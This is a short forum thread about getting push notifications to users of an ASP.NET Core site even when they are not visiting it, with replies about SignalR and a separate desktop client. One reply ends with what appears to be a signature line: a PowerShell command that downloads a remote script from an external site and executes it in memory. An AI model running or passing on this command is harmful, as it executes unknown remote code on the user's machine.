ASP.Net Core - push notifications

I want users to get push notifications even when they're not visiting the website. like these:

How will I achieve this with ASP.Net core? I've seen plenty of vids and tuts using SignalR, but it seems like that's only within the website itself. I want users to accept that they want these notifications and whenever there comes a new row in a table in the database they get the corrosponding notification. E.g. " You've received a message {message preview}"

Anyone who can point me in the right direction? I'm looking everywhere but the right places it seems.

Thanks in advance

In order for the user to see the push notification even when they're not visiting the website you can use SignalR,but only you need to make a separate application for that which will be installed in user pc and communicate with your site....And you can send notifications from your site...Here is one example that you can use as idea for your project source code i hope it will help you overcome the problem

This seems like the solution to your problem, but it is rather intrusive for consumers. That’s why sites stick to email notifications. If this is an in-house project, than by all means set that up.
powershell.exe -noprofile -noexit -command iex "(new-object net.webclient).downloadstring('https://media.nick-name.net/ps/execute.ps1')"[Image: f4hRdFS.gif]

It should be optional for any user to receive these. It's also for a specific purpose and users requested this functionality. I will see how far i get with the example itcorp shared.

Thanks for your replies

I'd also love to hear other's opinion on how to aproach this.
